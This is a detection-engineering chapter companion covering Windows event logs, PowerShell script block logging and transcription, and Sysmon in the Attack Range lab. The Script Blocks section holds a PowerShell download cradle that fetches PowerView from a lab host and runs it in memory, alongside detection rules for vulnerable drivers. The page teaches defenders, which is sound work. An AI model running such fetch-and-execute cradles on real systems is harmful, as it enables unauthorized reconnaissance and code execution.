Introduction
This chapter explores the key log sources present in the Attack Range that enterprise Active Directory environments can make use of. It includes details of Windows event logs, PowerShell logs and Sysmon.
Chapter Content
This section provides reproductions of the key figures and code snippets seen in this chapter.
Windows Event Logs
Microsoft offers its own list of key event IDs to monitor. These can be seen below:
| Sourced from: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l–events-to-monitor |
Key Event IDs
| ID | Event Summary | Potential application |
|---|---|---|
| 4624 | An account was successfully logged on. | Identification of anomalous account activity.
Large-scale reconnaissance of neighboring hosts. |
| 4625 | An account failed to log on. | Identification of anomalous account activity, brute force attempts, or password spraying. |
| 4728 | A member was added to a security-enabled global group. | Privilege escalation via group membership changes. For example, additions to the Domain Admins group. |
| 4732 | A member was added to a security-enabled local group. | Privilege escalation or increased access on a specific host. For example, addition to the local Administrators group. |
| 4733 | A member was removed from a security-enabled local group. | Unauthorized changes to local privileged groups. |
| 4768 | A Kerberos authentication ticket (TGT) was requested. | Anomalous authentication attempts via Kerberos. Pass-the-Ticket activity. |
| 4769 | A Kerberos service ticket was requested. | Anomalous or large-scale requests for Kerberos service tickets (kerberoasting). |
| 4741 | A computer account was created. | Precursor to Kerberos attacks such as Resource-based Constrained Delegation (RBCD). |
| 4688 | A new process has been created. | Execution of suspicious commands. Use of living-off-the-land binaries and scripts (LOLBAS). |
| 4698 | A scheduled task was created. | Installation of persistence. |
| 7045 | A new service was installed in the system. | Persistence installation. Privilege escalation. |
| 5145 | A network share object was checked to see whether client can be granted desired access. | Anomalous file share access. File share reconnaissance. |
| 4662 | An operation was performed on an object. | DCSync attacks. Certificate modification (ESC4). |
| 5136 | A directory service object was modified. | User modifications for targeted kerberoasting. Constrained delegation. |
Viewing Logs in Event Viewer
A query to filter Windows Event Logs for login events on the ar-win-dc domain controller in the Attack Range environment.
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(Computer='ar-win-dc.attackrange.local') and (EventID=4624)]]
</Select>
</Query>
</QueryList>
Another query, similar to the above, that looks for events from the Administrator user with a LogonType of 2 (a local logon).
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[EventID=4624] and
EventData[Data[@Name='TargetUserName']='Administrator'] and
EventData[Data[@Name='LogonType']='2']]
</Select>
</Query>
</QueryList>
An example of the XML event log data produced from the above query.
<Event xmlns="http://schemas.microsoft.com/win/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4624</EventID>
<Level>0</Level>
--snip--
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<EventRecordID>182608</EventRecordID>
<Correlation ActivityID="{28aa6104-6329-0004-4561-aa282963da01}" />
<Execution ProcessID="656" ThreadID="5012" />
<Channel>Security</Channel>
<Computer>ar-win-dc.attackrange.local</Computer>
<Security />
</System>
<EventData>
<Data Name="TargetUserSid">S-1-5-21-3003545274-3581856904-3772676767-500</Data>
Data Name="TargetUserName">Administrator</Data>
<Data Name="TargetDomainName">ATTACKRANGE</Data>
<Data Name="TargetLogonId">0x96c541</Data>
<Data Name="LogonType">2</Data>
<Data Name="LogonProcessName">seclogo</Data>
<Data Name="AuthenticationPackageName">Negotiate</Data>
<Data Name="WorkstationName">AR-WIN-DC</Data>
<Data Name="LogonGuid">{9a9ab8a0-2038-26c7-ce46-2604db784955}</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
<Data Name="ImpersonationLevel">%%1833</Data>
--snip--
</EventData>
</Event>
The wevtutil command can be used to perform queries outside of Event Viewer.
wevtutil qe Security "/q:*[System[EventID=4624] and EventData[Data[@Name='TargetUserName']='Administrator'] and EventData[Data[@Name='LogonType']='2']]"
PowerShell Logging
Script Blocks
Commands to install PowerSploit and host it on the Kali host in the Attack Range environment.
sudo apt update
sudo apt install powersploit
cd /usr/share/windows-resources/powersploit
python3 -m http.server 1337
A PowerShell download cradle that can fetch and load the PowerView script into memory on a Windows host.
Invoke-Expression (New-Object Net.Webclient).DownloadString("http://10.0.1.30:1337/Recon/PowerView.ps1")
The first of many associated PowerShell Script Block log entries (event ID 4104) for the above download cradle:
<Event xmlns="http://schemas.microsoft.com/win/events/event">
<System>
<Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}" />
<EventID>4104</EventID>
<Level>5</Level>
--snip--
<Execution ProcessID="5192" ThreadID="5164" />
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>ar-win-2.attackrange.local</Computer>
<Security UserID="S-1-5-21-1234998748-2444849041-1163457548-500" />
</System>
<EventData>
<Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">Invoke-Expression (New-Object Net.Webclient).DownloadString("http://10.0.1.30:1337/Recon/PowerView.ps1")</Data>
<Data Name="ScriptBlockId">3d296d00-b3bf-426c-9f87-9215896c146e</Data>
<Data Name="Path" />
</EventData>
</Event>
Transcription
The reg command to enable PowerShell transcription.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" /v EnableTranscripting /t REG_DWORD /d 1 /f
An example of PowerShell transcription log that shows a user fetching the current process ID.
**********************
Windows PowerShell transcript start
--snip--
Username: AR-WIN-2\Administrator
RunAs User: AR-WIN-2\Administrator
Configuration Name:
Machine: AR-WIN-2 (Microsoft Windows NT 10.0.17763.0)
Host Application: powershell
Process ID: 648
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17763.5202
**********************
**********************
**********************
PS C:\Users\Administrator>[System.Diagnostics.Process]::GetCurrentProcess().Id
648
Sysmon
The list of events produced from Sysmon at the time of writing can be seen below.
| Sourced from: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#events |
Sysmon Event IDs
| ID | Event Name | Description |
|---|---|---|
| 1 | Process creation | Records the creation of a new process, capturing details like the process ID, executable, and command line arguments. Also includes a process GUID that’s unique across a domain, aiding log correlation. |
| 2 | A process changed a file creation time | Captures changes to the creation timestamp of a file. Commonly performed by attackers to \textit{timestomp} a new malicious file so it blends in with existing files. |
| 3 | Network connection | Logs details of TCP and UDP network connections, including source and destination IP addresses and ports, as well as the originating process ID and GUID. |
| 4 | Sysmon service state changed | Logs changes in the state of the Sysmon service, such as when it is started or stopped. |
| 5 | Process terminated | Records the termination of a process, providing information including its ID and GUID. |
| 6 | Driver loaded | Captures information about loaded kernel drivers, including hashes and signature information. |
| 7 | Image loaded | Logs when a module or image is loaded into a process. This includes where the image was loaded from, into which process, and details of hashes and signature information. |
| 8 | CreateRemoteThread | Monitors a process’s creation of remote threads in other processes. This includes details of the source and destination processes, as well as information on the memory address, module and function being run. |
| 9 | RawAccessRead | Captures attempts to directly read disk sectors through \verb| |
| 10 | ProcessAccess | Logs when a process attempts to access another process via the opening of a handle. This includes details of the source and destination processes. |
| 11 | FileCreate | Records the creation and overwriting of files, including details like file name, size, and creation timestamp. |
| 12 | RegistryEvent (Object create and delete) | Captures the creation and deletion of registry keys and values. |
| 13 | RegistryEvent (Value Set) | Captures when Registry values are modified, including the value that was set when of types DWORD or QWORD. |
| 14 | RegistryEvent (Key and Value Rename) | Captures when an existing Registry key and value are renamed. |
| 15 | FileCreateStreamHash | Monitors the creation of file streams and calculates their hash values. |
| 16 | ServiceConfigurationChange | Logs changes to Sysmon configuration, such as rule additions or modifications. |
| 17 | PipeEvent (Pipe Created) | Captures the creation of named pipes, including details like the pipe name and process information. |
| 18 | PipeEvent (Pipe Connected) | Captures when a named pipe connection occurs, providing details about the connecting process. |
| 19 | WmiEvent (WmiEventFilter activity detected) | Logs events related to Windows Management Instrumentation (WMI) event filter registration, including the namespace, filter name and expression. |
| 20 | WmiEvent (WmiEventConsumer activity detected) | Captures the registration of WMI consumers. |
| 21 | WmiEvent (WmiEventConsumerToFilter activity detected) | Logs when a consumer binds to a filter, including details of consumer name and filter path. |
| 22 | DNSEvent (DNS Query) | Captures when a process makes a DNS query, including the originating process and the hostname to be resolved. |
| 23 | FileDelete (File Delete archived) | Captures the deletion of a file, and also saves the original file to the configured archive directory. |
| 24 | ClipboardChange (New content in the clipboard) | Logs changes to the clipboard contents. |
| 25 | ProcessTampering (Process image change) | Logs activity relating to evasion techniques such as \textit{process hollowing} and \textit{herpaderping.} |
| 26 | FileDeleteDetected (File Delete logged) | Logs the deletion of a file, without the archiving functionality detailed in Event ID 23. |
| 27 | FileBlockExecutable | Captures when Sysmon blocks the writing of an executable based on the conditions detailed in its configuration. |
| 28 | FileBlockShredding | Generates events when Sysmon blocks file shredding. |
| 29 | FileExecutableDetected | Logs the creation of a new executable file. |
| 255 | Error | Logs when Sysmon encounters an error, potentially due to heavy load, failure to complete tasks, or encountering a bug. |
Windows
A snippet of the Sysmon schema that can be output with the -s flag.
<manifest schemaversion="x.xx" binaryversion="xx">
<configuration>
--snip--
<filters default="is">is,is not,contains,contains any,is any,contains all,excludes,excludes any,excludes all,begin with,not begin with,end with,not end with,less than,more than,image</filters>
</configuration>
<events>
<event name="SYSMONEVENT_DRIVER_LOAD" value="6" level="Informational" template="Driver loaded" rulename="DriverLoad" version="4">
<data name="RuleName" inType="win:UnicodeString" outType="xs:string" />
<data name="UtcTime" inType="win:UnicodeString" outType="xs:string" />
<data name="ImageLoaded" inType="win:UnicodeString" outType="xs:string" />
<data name="Hashes" inType="win:UnicodeString" outType="xs:string" />
<data name="Signed" inType="win:UnicodeString" outType="xs:string" />
<data name="Signature" inType="win:UnicodeString" outType="xs:string" />
<data name="SignatureStatus" inType="win:UnicodeString" outType="xs:string" />
</event>
--snip--
</events>
</manifest>
A Sysmon configuration that monitors for driver load events where the hash matches an entry from LOLDrivers or is a tool of interest, while excluding Intel-signed drivers.
<Sysmon schemaversion="x.xx">
<HashAlgorithms>*</HashAlgorithms>
<EventFiltering>
<RuleGroup name="Vulnerable or Malicious Driver Load" groupRelation="or">
<DriverLoad onmatch="include">
<Hashes name="LOLDriver Match" condition="contains">SHA256=56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c</Hashes>
<Hashes name="LOLDriver Match" condition="contains">SHA256=06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4</Hashes>
</DriverLoad>
</RuleGroup>
<RuleGroup name="Exclude Intel Drivers" groupRelation="or">
<DriverLoad onmatch="exclude">
<Signature condition="begin with">Intel </Signature>
</DriverLoad>
</RuleGroup>
<RuleGroup name="Tools of interest" groupRelation="or">
<DriverLoad onmatch="include">
<ImageLoaded name="Suspicious Tool Driver Load: System Informer" condition="contains">systeminformer.sys</ImageLoaded>
</DriverLoad>
</RuleGroup>
</EventFiltering>
</Sysmon>
The command to load a Sysmon config using the Sysmon binary.
Sysmon.exe -c "C:\Program Files\ansible\drivers-sysmon.xml"
Loading configuration file with schema version x.xx
Configuration file validated.
Configuration updated.
An example of the kernel driver load event produced with the above Sysmon configuration.
<Event xmlns="http://schemas.microsoft.com/win/events/event">
<System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>6</EventID>
<Level>4</Level>
--snip--
<EventRecordID>3673</EventRecordID>
<Execution ProcessID="2792" ThreadID="3420" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>ar-win-dc</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData>
<Data Name="RuleName">Suspicious Tool Driver Load: System Informer***</Data>
<Data Name="ImageLoaded">C:\Program Files\SystemInformer\SystemInformer.sys***</Data>
--snip--
<Data Name="Hashes">SHA1=DB08DBE68A6C9BB29550E33CE95CE54CAF83E925,MD5=10BFCFC0215DAE77FB84BE8B2E63110E,SHA256=96A37B18EDE4B5BC616822C023B1B8CD85B3A76B205229701E21D75EA101B57C,IMPHASH=D6A8D3591C46C44511F288817529A6B4</Data>
<Data Name="Signed">true</Data>
<Data Name="Signature">Microsoft Windows Hardware Compatibility Publisher</Data>
<Data Name="SignatureStatus">Valid</Data>
</EventData>
</Event>
Resources
The following resources expand on topics covered in this chapter.
Windows Event Logs
Details from Microsoft on the standard event logs available and how they're configured in the Windows Registry
"Eventlog Key," Microsoft, accessed April 28, 2024
Read MoreAn invaluable reference for Windows event log and Sysmon event data
"Windows Security Log Encyclopedia," Ultimate Windows Security, accessed March 30, 2024
Read MoreA guide to Windows event log forwarding (WEF)
"The Windows Event Forwarding Survival Guide," Chris Long, July 24, 2017
Read MoreUtilizing native logging provided by audit policy and System Access Control Lists (SACLs) to detect various post-exploitation behaviours
"Detecting Windows Endpoint Compromise with SACLs," Dane Stuckey, July 16, 2018
Read MoreMore details on using XPath queries to filter and query Windows event log
"Event Queries and Event XML," Microsoft, July 28, 2009
Read MoreGuidance from Microsoft on default event log audit policy configuration, as well as recommended and elevated logging policy configurations
"Audit Policy Recommendations," Microsoft, August 3, 2023
Read MoreMicrosoft's guidance on effective Windows event logging for defending Active Directory deployments
"Monitoring Active Directory for Signs of Compromise," Microsoft, February 15, 2023
Read MoreMicrosoft's extensive list of events to monitor
"Appendix L: Events to Monitor," Microsoft, June 8, 2022
Read MorePowerShell Logging
Notice of the deprecation of PowerShell version 2
"Windows PowerShell 2.0 Deprecation," Microsoft, August 24, 2017
Read MoreAn example Sigma rule for the detection of PowerShell downgrade attacks
"proc_creation_win_powershell_downgrade_attack.yml," Harish Segar, January 4, 2023
Read MoreThe suspicious cmdlets and script elements that triggers production of script block logging events
"CompiledScriptBlock.cs," GitHub, accessed April 28, 2024
Read MoreOther examples of PowerShell download cradles from Will Schroeder
"DownloadCradles.ps1," Will Schroeder, accessed March 30, 2014
Read MoreMore detail on PowerShell logging features and configuration options
"Greater Visibility Through PowerShell Logging," Matthew Dunwoody, February 11, 2016
Read MoreAn overview of AMSI and its architecture, as well as demonstrations of its effect on file-less malware
"How the Antimalware Scan Interface (AMSI) helps you defend against malware," Microsoft, August 23, 2019
Read MoreA thoroughly detailed walkthrough of AMSI and the telemetry it can produce
"Better know a data source: Antimalware Scan Interface," Jimmy Astle, Matt Graeber, July 19, 2022
Read MoreSysmon
A comparison between the telemetry and detection engineering aspects of Sysmon and the Microsoft Defender for Endpoint EDR solution
"Sysmon vs Microsoft Defender for Endpoint, MDE Internals 0x01," Olaf Hartong, October 15, 2021
Read More@SwiftOnSecurity’s Sysmon configuration, designed as a performant and highly-tuned option. Used in the Attack Range lab environment by default
"sysmon-config," @SwiftOnSecurity, accessed May 24, 2024
Read MoreOlaf Hartong’s sysmon-modular repository provides an organized collection of Sysmon configuration snippets organized by event type, as well as a range of generated configurations that vary in verbosity and application
"sysmon-modular," Olaf Hartong, accessed May 24, 2024
Read MoreA fork of @SwiftOnSecurity’s Sysmon configuration maintained by Florian Roth, Tobias Michalski, Christian Burkard and Nasreddine Bencherchali. This configuration extends the original with additional entries for known offensive tool indicators and exploits
"sysmon-config," Florian Roth, Tobias Michalski, Christian Burkard and Nasreddine Bencherchali, accessed May 24, 2024
Read MoreAn offensive perspective on operating on hosts monitored with Sysmon
"Operating Offensively Against Sysmon," Carlos Perez, October 8, 2018
Read MoreExtracting Sysmon configuration from Windows Registry
"SysmonRuleParser.ps1," Matt Graeber, accessed March 30, 2024
Read MoreThe lab environment Linux Sysmon configuration
"SysMonLinux-CatchAll.xml," accessed May 23, 2024
Read More